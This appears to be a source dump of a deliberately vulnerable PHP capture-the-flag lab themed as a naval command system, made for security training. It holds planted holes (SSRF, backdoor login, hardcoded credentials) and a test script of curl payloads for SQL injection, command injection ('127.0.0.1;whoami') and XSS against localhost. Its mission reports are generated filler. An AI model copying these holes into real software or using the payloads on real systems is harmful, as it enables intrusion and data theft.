Submitted by: Zachary Cooley 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /static/less/animated.less: -------------------------------------------------------------------------------- 1 | // Animated Icons 2 | // -------------------------- 3 | 4 | .@{fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 | 9 | .@{fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /static/scss/_animated.scss: -------------------------------------------------------------------------------- 1 | // Spinning Icons 2 | // -------------------------- 3 | 4 | .#{$fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 | 9 | .#{$fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /missions/mission_report_14.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #14 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Mesh Open-Source Methodologies 9 | - Objective: Triple-buffered non-volatile Internet solution 10 | - Location: Williamsburgh, Chad 11 | - Start Time: 2025-01-13 02:23:00 12 | - End Time: 2025-01-19 13:10:24 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Treatment teach agent instead national economic little. Security rate crime reflect force training toward. Increase news data a drop. Situation them law listen source message. Evening pattern anyone occur. 17 | 18 | Submitted by: Katherine Montgomery 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_15.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #15 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Benchmark Frictionless Experiences 9 | - Objective: Multi-tiered optimal model 10 | - Location: Lake Morgan, Mexico 11 | - Start Time: 2025-03-28 15:29:59 12 | - End Time: 2025-01-27 00:38:02 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Tend thus summer treat several. Future according million peace husband decade ready. Travel marriage like range fish win technology. Politics tough major myself green business address. Get in both forward cup. Per view close interview they per structure. 17 | 18 | Submitted by: Kenneth Fuller 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_4.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #4 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Integrate Mission-Critical Web-Readiness 9 | - Objective: User-centric methodical time-frame 10 | - Location: Lake Jasonhaven, Angola 11 | - Start Time: 2025-01-11 21:58:44 12 | - End Time: 2025-03-03 06:48:15 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Win open modern somebody play significant. Compare which now lose. She role family debate note likely director network. Level under morning wrong change fact us. Inside agreement character there now center writer. Whose truth better camera statement. 17 | 18 | Submitted by: George Tate 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_9.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #9 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Deploy Customized Models 9 | - Objective: Mandatory uniform time-frame 10 | - Location: Adkinschester, Andorra 11 | - Start Time: 2025-03-22 09:11:03 12 | - End Time: 2025-01-06 18:04:45 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Resource performance from say toward detail a meeting. Table station door since probably expert audience. American or around goal. View number organization near shoulder pressure speech. Land successful member imagine military particularly. High again shake director enjoy until. 17 | 18 | Submitted by: Alan Carey 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_7.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #7 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Productize Innovative E-Business 9 | - Objective: Proactive static adapter 10 | - Location: South Stephanie, Cocos (Keeling) Islands 11 | - Start Time: 2025-02-10 15:14:25 12 | - End Time: 2025-01-13 09:23:33 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Including month environment also. Hour another maintain physical whole close raise. Lead mention our talk move something. Voice us grow between deal hear world. The enjoy when how product ball audience everything. Reduce reason cup serve. Support next over start mission. 17 | 18 | Submitted by: Robert Hernandez 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Nana Sei Anyemedu 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8.1-apache 2 | 3 | # Install mysqli extension 4 | RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli 5 | 6 | # Install additional tools for CTF 7 | RUN apt-get update && apt-get install -y \ 8 | mariadb-client \ 9 | vim \ 10 | curl \ 11 | netcat-traditional \ 12 | && rm -rf /var/lib/apt/lists/* 13 | 14 | # Copy application files 15 | COPY . /var/www/html/ 16 | 17 | # Set permissions for writable directories 18 | RUN chmod 777 /var/www/html/logs \ 19 | && chmod 777 /var/www/html/mission_uploads \ 20 | && chmod 777 /var/www/html/missions 21 | 22 | # Create log files if they don't exist 23 | RUN touch /var/www/html/logs/access.log \ 24 | && touch /var/www/html/logs/admin_activity.log \ 25 | && touch /var/www/html/logs/backup_access.log \ 26 | && touch /var/www/html/logs/upload.log \ 27 | && touch /var/www/html/logs/sqli_debug.log \ 28 | && touch /var/www/html/logs/player_progress.log \ 29 | && chmod 666 /var/www/html/logs/*.log 30 | 31 | # Enable Apache modules 32 | RUN a2enmod rewrite 33 | 34 | # Configure Apache to allow .htaccess 35 | RUN sed -i '//,/<\/Directory>/ s/AllowOverride None/AllowOverride All/' /etc/apache2/apache2.conf 36 | 37 | # Expose port 80 38 | EXPOSE 80 39 | 40 | # Start Apache 41 | CMD ["apache2-foreground"] 42 | -------------------------------------------------------------------------------- /honeypot_trap.php: -------------------------------------------------------------------------------- 1 | 9 | 10 | 11 | 12 | Bot Detected 13 | 28 | 29 | 30 |

BOT DETECTED

31 |

Your automated attack tools have been identified. (If you didn't use one then you are a bot in human form)

32 |

We've logged your IP and user agent.(Just Joking)

33 |

Real hackers don't use scripts - try harder!

34 | 35 | 
36 |   _____
37 |  /     \
38 |  | () () |
39 |  \  ^  /
40 |   |||||
41 |   |||||
42 |
43 | 44 |

This is not the real system. Go back and try again.

45 | 46 | 47 | -------------------------------------------------------------------------------- /admin/log_viewer.php: -------------------------------------------------------------------------------- 1 | 24 | 25 | 26 | 27 | Log Viewer | <?= ucfirst($log) ?> Log 28 | 29 | 30 | 31 | 32 |
33 |

Naval Command :: Log Viewer

34 | 35 | Back to Admin 36 | 37 |
38 | 39 |
40 |

Log

41 |
42 |
43 |
44 |
45 | 46 | 47 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | web: 5 | build: . 6 | container_name: hive_naval_web 7 | ports: 8 | - "80:80" 9 | volumes: 10 | - ./logs:/var/www/html/logs 11 | - ./mission_uploads:/var/www/html/mission_uploads 12 | depends_on: 13 | - db 14 | networks: 15 | - hive_network 16 | environment: 17 | - DB_HOST=db 18 | - DB_NAME=hive_naval 19 | - DB_USER=hive_user 20 | - DB_PASS=N@vyS3cr3t! 21 | 22 | db: 23 | image: mariadb:10.11 24 | container_name: hive_naval_db 25 | environment: 26 | MYSQL_ROOT_PASSWORD: rootpassword 27 | MYSQL_DATABASE: hive_naval 28 | MYSQL_USER: hive_user 29 | MYSQL_PASSWORD: N@vyS3cr3t! 30 | volumes: 31 | - ./officers.sql:/docker-entrypoint-initdb.d/01-schema.sql 32 | - db_data:/var/lib/mysql 33 | networks: 34 | - hive_network 35 | ports: 36 | - "3306:3306" 37 | 38 | phpmyadmin: 39 | image: phpmyadmin:latest 40 | container_name: hive_naval_phpmyadmin 41 | environment: 42 | PMA_HOST: db 43 | PMA_USER: hive_user 44 | PMA_PASSWORD: N@vyS3cr3t! 45 | ports: 46 | - "8080:80" 47 | depends_on: 48 | - db 49 | networks: 50 | - hive_network 51 | 52 | networks: 53 | hive_network: 54 | driver: bridge 55 | 56 | volumes: 57 | db_data: 58 | -------------------------------------------------------------------------------- /assets/style-enhanced.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Arial, sans-serif; 3 | background: #046d09; 4 | margin: 0; 5 | padding: 0; 6 | } 7 | 8 | h2 { 9 | text-align: center; 10 | color: #dde7df; 11 | font-size: 40px; 12 | } 13 | 14 | form { 15 | max-width: 800px; 16 | margin: 50px auto; 17 | padding: 50px; 18 | border: 2px solid #080808; 19 | background: white; 20 | border-radius: 10px; 21 | box-shadow: 0 0 20px rgba(22, 22, 22, 0.1); 22 | } 23 | 24 | input[type="text"], 25 | input[type="password"], 26 | input[type="email"] { 27 | width: 95%; 28 | font-size: 24px; 29 | padding: 10px; 30 | margin: 10px 0; 31 | border: 1px solid #a8a6a6; 32 | border-radius: 5px; 33 | } 34 | 35 | button { 36 | width: 50%; 37 | text-align: center; 38 | margin-left: 10em; 39 | margin-top: 20px; 40 | justify-content: center; 41 | font-size: 20px; 42 | padding: 10px; 43 | background-color: #023a0c; 44 | color: white; 45 | font-weight: bold; 46 | border: none; 47 | border-radius: 4px; 48 | cursor: pointer; 49 | } 50 | 51 | button:hover { 52 | background-color: #098b2a; 53 | } 54 | 55 | p { 56 | text-align: center; 57 | color: red; 58 | } 59 | 60 | .signup-text { 61 | color: white; 62 | text-align: center; 63 | font-size: 20px; 64 | margin-top: 20px; 65 | margin-bottom: 20px; 66 | 67 | } 68 | 69 | .signup-text a { 70 | color: #25098b; 71 | text-decoration: none; 72 | font-weight: bold; 73 | } -------------------------------------------------------------------------------- /admin/emergency_access.php: -------------------------------------------------------------------------------- 1 | "; 6 | echo "SELF DESTRUCT SEQUENCE INITIATED\n"; 7 | for ($i=10; $i>0; $i--) { 8 | echo "$i...\n"; 9 | sleep(1); 10 | } 11 | echo "Just kidding! This is a test system.\n"; 12 | echo "But you found the Easter egg!\n"; 13 | echo ""; 14 | exit(); 15 | } 16 | } 17 | ?> 18 | 19 | 20 | 21 | Emergency Access 22 | 45 | 46 | 47 |

EMERGENCY ACCESS PORTAL

48 |

Enter destruct code:

49 |
50 | 51 | 52 |
53 | 54 | 55 | -------------------------------------------------------------------------------- /static/less/mixins.less: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | .fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | .fa-icon-rotate(@degrees, @rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation})"; 16 | -webkit-transform: rotate(@degrees); 17 | -ms-transform: rotate(@degrees); 18 | transform: rotate(@degrees); 19 | } 20 | 21 | .fa-icon-flip(@horiz, @vert, @rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation}, mirror=1)"; 23 | -webkit-transform: scale(@horiz, @vert); 24 | -ms-transform: scale(@horiz, @vert); 25 | transform: scale(@horiz, @vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 30 | // 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | .sr-only() { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | .sr-only-focusable() { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /static/scss/_mixins.scss: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | @mixin fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | @mixin fa-icon-rotate($degrees, $rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation})"; 16 | -webkit-transform: rotate($degrees); 17 | -ms-transform: rotate($degrees); 18 | transform: rotate($degrees); 19 | } 20 | 21 | @mixin fa-icon-flip($horiz, $vert, $rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation}, mirror=1)"; 23 | -webkit-transform: scale($horiz, $vert); 24 | -ms-transform: scale($horiz, $vert); 25 | transform: scale($horiz, $vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 30 | // 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | @mixin sr-only { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | @mixin sr-only-focusable { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /log_flag.php: -------------------------------------------------------------------------------- 1 | 'Invalid data']); 14 | exit; 15 | } 16 | 17 | $flag_id = $data['flag_id'] ?? ''; 18 | $flag_value = $data['flag_value'] ?? ''; 19 | $points = $data['points'] ?? 0; 20 | $timestamp = $data['timestamp'] ?? date('Y-m-d H:i:s'); 21 | 22 | // Get player info 23 | $player_ip = $_SERVER['REMOTE_ADDR']; 24 | $player_username = $_SESSION['user']['username'] ?? 'anonymous'; 25 | $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown'; 26 | 27 | // Log to file 28 | $log_entry = sprintf( 29 | "[%s] Player: %s | IP: %s | Flag: %s | Value: %s | Points: %d\n", 30 | $timestamp, 31 | $player_username, 32 | $player_ip, 33 | $flag_id, 34 | $flag_value, 35 | $points 36 | ); 37 | 38 | file_put_contents( 39 | __DIR__ . '/logs/player_progress.log', 40 | $log_entry, 41 | FILE_APPEND | LOCK_EX 42 | ); 43 | 44 | // Also log to detailed JSON log for leaderboard 45 | $json_log_file = __DIR__ . '/logs/player_progress.json'; 46 | $json_logs = []; 47 | 48 | if (file_exists($json_log_file)) { 49 | $json_logs = json_decode(file_get_contents($json_log_file), true) ?: []; 50 | } 51 | 52 | $json_logs[] = [ 53 | 'timestamp' => $timestamp, 54 | 'player' => $player_username, 55 | 'ip' => $player_ip, 56 | 'flag_id' => $flag_id, 57 | 'flag_value' => $flag_value, 58 | 'points' => $points, 59 | 'user_agent' => $user_agent 60 | ]; 61 | 62 | file_put_contents( 63 | $json_log_file, 64 | json_encode($json_logs, JSON_PRETTY_PRINT), 65 | LOCK_EX 66 | ); 67 | 68 | echo json_encode(['success' => true, 'message' => 'Flag logged successfully']); 69 | ?> 70 | -------------------------------------------------------------------------------- /fake_dashboard.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | Naval Command Dashboard 15 | 41 | 42 | 43 |
44 |

! WARNING !

45 |

You've reached a FAKE dashboard

46 | 47 |
48 | ____ 49 | / \ 50 | | STOP | 51 | \____/ 52 | | | 53 | / \ 54 | | TRY | 55 | \____/ 56 | HARDER 57 |
58 | 59 |

Your Hacking Attempt:

60 | 65 | 66 |

Fake Data Exposed:

67 |

• Nuclear Codes: 12345

68 |

• Admin Password: password123

69 |

• Secret Base: 42.3647° N, 71.1042° W

70 | 71 |

This is a trap! Your attempt has been logged.

72 |
73 | 74 | 75 | -------------------------------------------------------------------------------- /reset.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # HIVE Naval System - Reset Script 4 | # This script resets the CTF lab to its initial state 5 | 6 | echo "🚢 HIVE Naval System - Reset Script" 7 | echo "====================================" 8 | echo "" 9 | 10 | # Colors for output 11 | RED='\033[0;31m' 12 | GREEN='\033[0;32m' 13 | YELLOW='\033[1;33m' 14 | NC='\033[0m' # No Color 15 | 16 | # Check if running as root/sudo 17 | if [ "$EUID" -ne 0 ]; then 18 | echo -e "${RED}Please run as root or with sudo${NC}" 19 | exit 1 20 | fi 21 | 22 | echo -e "${YELLOW}This will reset the database and clear all logs and uploads.${NC}" 23 | read -p "Are you sure you want to continue? (y/N) " -n 1 -r 24 | echo 25 | if [[ ! $REPLY =~ ^[Yy]$ ]]; then 26 | echo "Reset cancelled." 27 | exit 1 28 | fi 29 | 30 | echo "" 31 | echo "Step 1: Resetting database..." 32 | mysql -u root -p hive_naval < officers.sql 33 | if [ $? -eq 0 ]; then 34 | echo -e "${GREEN}✓ Database reset successfully${NC}" 35 | else 36 | echo -e "${RED}✗ Database reset failed${NC}" 37 | exit 1 38 | fi 39 | 40 | echo "" 41 | echo "Step 2: Clearing log files..." 42 | > logs/access.log 43 | > logs/admin_activity.log 44 | > logs/backup_access.log 45 | > logs/upload.log 46 | > logs/sqli_debug.log 47 | > logs/player_progress.log 48 | echo -e "${GREEN}✓ Log files cleared${NC}" 49 | 50 | echo "" 51 | echo "Step 3: Clearing uploaded files..." 52 | find mission_uploads -type f ! -name '.gitkeep' -delete 2>/dev/null 53 | if [ $? -eq 0 ]; then 54 | echo -e "${GREEN}✓ Uploaded files cleared${NC}" 55 | else 56 | echo -e "${YELLOW}⚠ No uploaded files to clear${NC}" 57 | fi 58 | 59 | echo "" 60 | echo "Step 4: Resetting file permissions..." 61 | chmod 777 logs 62 | chmod 777 mission_uploads 63 | chmod 666 logs/*.log 2>/dev/null 64 | echo -e "${GREEN}✓ Permissions reset${NC}" 65 | 66 | echo "" 67 | echo "Step 5: Clearing session files..." 68 | rm -f /tmp/sess_* 2>/dev/null 69 | echo -e "${GREEN}✓ Sessions cleared${NC}" 70 | 71 | echo "" 72 | echo -e "${GREEN}========================================${NC}" 73 | echo -e "${GREEN}✓ Reset complete!${NC}" 74 | echo -e "${GREEN}========================================${NC}" 75 | echo "" 76 | echo "The CTF lab has been reset to its initial state." 77 | echo "You can now start fresh!" 78 | echo "" 79 | echo "To start the lab:" 80 | echo " - Native: Access http://localhost/" 81 | echo " - Docker: Run 'docker-compose up -d'" 82 | echo "" 83 | -------------------------------------------------------------------------------- /admin/backup_db.php: -------------------------------------------------------------------------------- 1 | 0) { 25 | // Get column names from the first row 26 | $firstRow = mysqli_fetch_assoc($result); 27 | fputcsv($output, array_keys($firstRow)); 28 | fputcsv($output, $firstRow); 29 | 30 | // Fetch remaining rows 31 | while ($row = mysqli_fetch_assoc($result)) { 32 | fputcsv($output, $row); 33 | } 34 | } else { 35 | fputcsv($output, ["No data found in $table"]); 36 | } 37 | fputcsv($output, []); 38 | } 39 | fclose($output); 40 | exit(); 41 | } 42 | 43 | // Regular HTML output 44 | ?> 45 | 46 | 47 | 48 | Database Backup Portal 49 | 93 | 94 | 95 | 96 |
97 |

Naval Database Backup

98 | DOWNLOAD FULL DATABASE (CSV) 99 | 100 |

Raw Data Preview:

101 | 
102 |          0) {
113 |                 while ($row = mysqli_fetch_assoc($result)) {
114 |                     // Avoid exposing passwords
115 |                     if (isset($row['password'])) {
116 |                         $row['password'] = '[REDACTED]';
117 |                     }
118 |                     print_r($row);
119 |                 }
120 |             } else {
121 |                 echo "No data or error in $table\n";
122 |             }
123 |             echo "\n";
124 |         }
125 | 
126 |         // Secure logging (optional, but improved)
127 |         file_put_contents(
128 |             '../logs/backup_access.log',
129 |             date('Y-m-d H:i:s') . " - Accessed by: " . $_SERVER['REMOTE_ADDR'] . "\n",
130 |             FILE_APPEND
131 |         );
132 |         ?>
133 |
134 |
135 | 136 | 137 | -------------------------------------------------------------------------------- /test_vulnerabilities.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # HIVE Naval System - Vulnerability Test Script 4 | # This script tests that all intentional vulnerabilities are still working 5 | 6 | echo "🔍 HIVE Naval System - Vulnerability Test Suite" 7 | echo "================================================" 8 | echo "" 9 | 10 | # Configuration 11 | TARGET="http://localhost" 12 | PASSED=0 13 | FAILED=0 14 | 15 | # Colors 16 | GREEN='\033[0;32m' 17 | RED='\033[0;31m' 18 | YELLOW='\033[1;33m' 19 | NC='\033[0m' 20 | 21 | # Test function 22 | test_vulnerability() { 23 | local name=$1 24 | local command=$2 25 | local expected=$3 26 | 27 | echo -n "Testing $name... " 28 | 29 | result=$(eval $command 2>&1) 30 | 31 | if echo "$result" | grep -q "$expected"; then 32 | echo -e "${GREEN}✓ PASS${NC}" 33 | ((PASSED++)) 34 | else 35 | echo -e "${RED}✗ FAIL${NC}" 36 | ((FAILED++)) 37 | fi 38 | } 39 | 40 | echo "Starting vulnerability tests..." 41 | echo "" 42 | 43 | # Test 1: SQL Injection 44 | echo "=== Authentication Vulnerabilities ===" 45 | test_vulnerability \ 46 | "SQL Injection Login" \ 47 | "curl -s -X POST $TARGET/login.php -d 'username=admin'\''--&password=test' -L" \ 48 | "admin" 49 | 50 | # Test 2: Default Credentials 51 | test_vulnerability \ 52 | "Default Credentials (carl)" \ 53 | "curl -s -X POST $TARGET/login.php -d 'username=carl&password=ilovemywife' -L" \ 54 | "carl" 55 | 56 | # Test 3: Backdoor Account 57 | test_vulnerability \ 58 | "Backdoor Account (navyseal)" \ 59 | "curl -s -X POST $TARGET/login.php -d 'username=navyseal&password=open sesame' -L" \ 60 | "navyseal" 61 | 62 | # Test 4: Debug Mode 63 | test_vulnerability \ 64 | "Debug Information Leak" \ 65 | "curl -s -X POST $TARGET/login.php -d 'username=debug&password=test'" \ 66 | "Debug: Query was" 67 | 68 | echo "" 69 | echo "=== Command Injection Vulnerabilities ===" 70 | 71 | # Test 5: Command Injection in Dashboard 72 | test_vulnerability \ 73 | "Command Injection (ping)" \ 74 | "curl -s '$TARGET/dashboard.php?check_status=127.0.0.1;whoami'" \ 75 | "www-data\|root\|apache" 76 | 77 | # Test 6: File Upload (check if upload page is accessible) 78 | test_vulnerability \ 79 | "File Upload Page Access" \ 80 | "curl -s $TARGET/components/upload.php" \ 81 | "Upload Mission Report" 82 | 83 | echo "" 84 | echo "=== Information Disclosure ===" 85 | 86 | # Test 7: Database Backup Access 87 | test_vulnerability \ 88 | "Database Backup Access" \ 89 | "curl -s $TARGET/admin/backup_db.php" \ 90 | "Database Preview" 91 | 92 | # Test 8: Secret Backup Code 93 | test_vulnerability \ 94 | "Secret Backup Code" \ 95 | "curl -s '$TARGET/admin/backup_db.php?code=1337'" \ 96 | "CTF{backdoor_backup_1337}" 97 | 98 | # Test 9: Officer Profiles (IDOR) 99 | test_vulnerability \ 100 | "IDOR - Officer Profiles" \ 101 | "curl -s '$TARGET/view_profile.php?officer_id=1'" \ 102 | "Officer Profile" 103 | 104 | echo "" 105 | echo "=== Session Management ===" 106 | 107 | # Test 10: Session Fixation 108 | test_vulnerability \ 109 | "Session Fixation" \ 110 | "curl -s '$TARGET/login.php?sessionid=hacked123'" \ 111 | "Naval System Login" 112 | 113 | # Test 11: Cookie Override (check if cookie is accepted) 114 | test_vulnerability \ 115 | "Cookie Admin Override" \ 116 | "curl -s -b 'override_admin=true' $TARGET/admin/index.php" \ 117 | "ADMIN PORTAL\|Admin" 118 | 119 | echo "" 120 | echo "=== XSS Vulnerabilities ===" 121 | 122 | # Test 12: XSS in Dashboard 123 | test_vulnerability \ 124 | "XSS in Dashboard Greeting" \ 125 | "curl -s '$TARGET/dashboard.php?greeting='" \ 126 | "" 127 | 128 | # Test 13: XSS in Admin Panel 129 | test_vulnerability \ 130 | "XSS in Admin Welcome" \ 131 | "curl -s '$TARGET/admin/index.php?welcome='" \ 132 | "" 133 | 134 | echo "" 135 | echo "=== Easter Eggs ===" 136 | 137 | # Test 14: Honeypot 138 | test_vulnerability \ 139 | "Honeypot Trap" \ 140 | "curl -s -X POST $TARGET/login.php -d 'username=test&password=test&honeypot=bot' -L" \ 141 | "honeypot" 142 | 143 | echo "" 144 | echo "================================================" 145 | echo "Test Results:" 146 | echo -e "${GREEN}Passed: $PASSED${NC}" 147 | echo -e "${RED}Failed: $FAILED${NC}" 148 | echo "Total: $((PASSED + FAILED))" 149 | echo "================================================" 150 | 151 | if [ $FAILED -eq 0 ]; then 152 | echo -e "${GREEN}All vulnerabilities are working correctly!${NC}" 153 | exit 0 154 | else 155 | echo -e "${YELLOW}Some vulnerabilities may not be working as expected.${NC}" 156 | echo "Please review the failed tests above." 157 | exit 1 158 | fi 159 | -------------------------------------------------------------------------------- /missions/intelligence_fetch.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | Intelligence Gathering Tool | HIVE Naval System 10 | 11 | 68 | 69 | 70 |
71 | ← Back to Dashboard 72 | 73 |

🌐 Intelligence Gathering Tool

74 |

Fetch intelligence reports from external sources.

75 | 76 |
77 |
78 | 79 | 80 |
81 | 82 | '; 87 | echo "

Intelligence Report from: " . htmlspecialchars($url) . "

"; 88 | 89 | // VULNERABILITY: SSRF - No URL validation or filtering 90 | try { 91 | $context = stream_context_create([ 92 | 'http' => [ 93 | 'timeout' => 5, 94 | 'user_agent' => 'HIVE-Naval-Intelligence-Bot/1.0' 95 | ] 96 | ]); 97 | 98 | $content = @file_get_contents($url, false, $context); 99 | 100 | if ($content !== false) { 101 | echo "
";
102 |                     echo htmlspecialchars($content);
103 |                     echo "
"; 104 | } else { 105 | echo "

Failed to fetch content from URL.

"; 106 | } 107 | 108 | } catch (Exception $e) { 109 | echo "

Error: " . htmlspecialchars($e->getMessage()) . "

"; 110 | } 111 | 112 | echo '
'; 113 | } 114 | ?> 115 | 116 |
117 |

🎯 Challenge Hint

118 |

This tool fetches content from any URL without validation. Can you access internal services?

119 |

Try these payloads:

120 | 126 |

Flag: If you successfully access an internal service, you've captured FLAG-030: CTF{ssrf_internal_access} (15 points)

127 |
128 | 129 | 130 | 131 | -------------------------------------------------------------------------------- /missions/xxe_parser.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | Mission Planning XML Parser | HIVE Naval System 10 | 11 | 69 | 70 | 71 |
72 | ← Back to Dashboard 73 | 74 |

🗺️ Mission Planning XML Parser

75 |

Upload mission planning data in XML format for processing.

76 | 77 |
